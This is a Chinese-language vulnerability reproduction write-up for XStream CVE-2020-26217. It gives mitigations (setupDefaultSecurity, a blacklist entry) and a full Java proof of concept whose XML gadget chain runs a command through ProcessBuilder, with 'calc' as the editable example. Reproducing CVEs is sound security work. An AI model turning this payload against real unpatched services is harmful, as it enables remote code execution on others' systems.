【漏洞复现】CVE-2020-26217 | XStream远程代码执行漏洞

写在前面

影响范围为XStream < 1.4.14,小版本也需要加黑名单，但是复现过程中只有所有常规版本和下图红标小版本复现成功：

另外还需要XPP3、xmlpull这两个jar包，JDK9无法触发成功。
复现过程中发现1.4.10及以上版本通过在使用fromXML方法前开启默认安全配置：

XStream xStream = new XStream();
XStream.setupDefaultSecurity(xStream);    #开启默认安全配置
String xml = ""
xStream.fromXML(xml);

来完成漏洞规避，经测试无法触发漏洞，无需升级到1.4.14。
当然通过补充本次被绕过的黑名单：javax.imageio.ImageIO$ContainsFilter 也可以进行临时防护，可参考官方说明中的Workaround部分：http://x-stream.github.io/CVE-2020-26217.html

准备环境

1.XStream Core
<!-- https://mvnrepository.com/artifact/com.thoughtworks.xstream/xstream -->
<dependency>
    <groupId>com.thoughtworks.xstream</groupId>
    <artifactId>xstream</artifactId>
    <version>1.4.9</version>
</dependency>

2.XPP3
<!-- https://mvnrepository.com/artifact/org.ogce/xpp3 -->
<dependency>
    <groupId>org.ogce</groupId>
    <artifactId>xpp3</artifactId>
    <version>1.1.6</version>
</dependency>
3.xmlpull
<!-- https://mvnrepository.com/artifact/xmlpull/xmlpull -->
<dependency>
    <groupId>xmlpull</groupId>
    <artifactId>xmlpull</artifactId>
    <version>1.1.3.1</version>
</dependency>

根据官方说明编写测试POC：

import com.thoughtworks.xstream.XStream;
public class vultest {
	public static void main(String[] args) {
		XStream xStream = new XStream();
		//XStream.setupDefaultSecurity(xStream);
		String xml = "<map>
" +
				"  <entry>
" +
				"    <jdk.nashorn.internal.objects.NativeString>
" +
				"      <flags>0</flags>
" +
				"      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
" +
				"        <dataHandler>
" +
				"          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
" +
				"            <contentType>text/plain</contentType>
" +
				"            <is class='java.io.SequenceInputStream'>
" +
				"              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
" +
				"                <iterator class='javax.imageio.spi.FilterIterator'>
" +
				"                  <iter class='java.util.ArrayList$Itr'>
" +
				"                    <cursor>0</cursor>
" +
				"                    <lastRet>-1</lastRet>
" +
				"                    <expectedModCount>1</expectedModCount>
" +
				"                    <outer-class>
" +
				"                      <java.lang.ProcessBuilder>
" +
				"                        <command>
" +
				"                          <string>calc</string>
" +                  #修改此处string来调用ProcessBuilder执行命令，此处以calc为例
				"                        </command>
" +
				"                      </java.lang.ProcessBuilder>
" +
				"                    </outer-class>
" +
				"                  </iter>
" +
				"                  <filter class='javax.imageio.ImageIO$ContainsFilter'>
" +
				"                    <method>
" +
				"                      <class>java.lang.ProcessBuilder</class>
" +
				"                      <name>start</name>
" +
				"                      <parameter-types/>
" +
				"                    </method>
" +
				"                    <name>start</name>
" +
				"                  </filter>
" +
				"                  <next/>
" +
				"                </iterator>
" +
				"                <type>KEYS</type>
" +
				"              </e>
" +
				"              <in class='java.io.ByteArrayInputStream'>
" +
				"                <buf></buf>
" +
				"                <pos>0</pos>
" +
				"                <mark>0</mark>
" +
				"                <count>0</count>
" +
				"              </in>
" +
				"            </is>
" +
				"            <consumed>false</consumed>
" +
				"          </dataSource>
" +
				"          <transferFlavors/>
" +
				"        </dataHandler>
" +
				"        <dataLen>0</dataLen>
" +
				"      </value>
" +
				"    </jdk.nashorn.internal.objects.NativeString>
" +
				"    <string>test</string>
" +
				"  </entry>
" +
				"</map>";
		//final Iterator<?> iterator = (Iterator<?>) xStream.fromXML(xml);
		//iterator.hasNext();
		xStream.fromXML(xml);
	}

}

漏洞复现

1.编译上述poc:
javac -cp xstream-1.4.13.jar vultest.java
2.运行验证：
"C:Program FilesJavajre1.8.0_231injava.exe" -classpath .;xstream-1.4.13.jar;xmlpull-1.1.3.1.jar;xpp3-1.1.6.jar vultest #JDK9测试无法触发，1.8可以，故使用1.8来验证

参考

[1]https://x-stream.github.io/CVE-2020-26217.html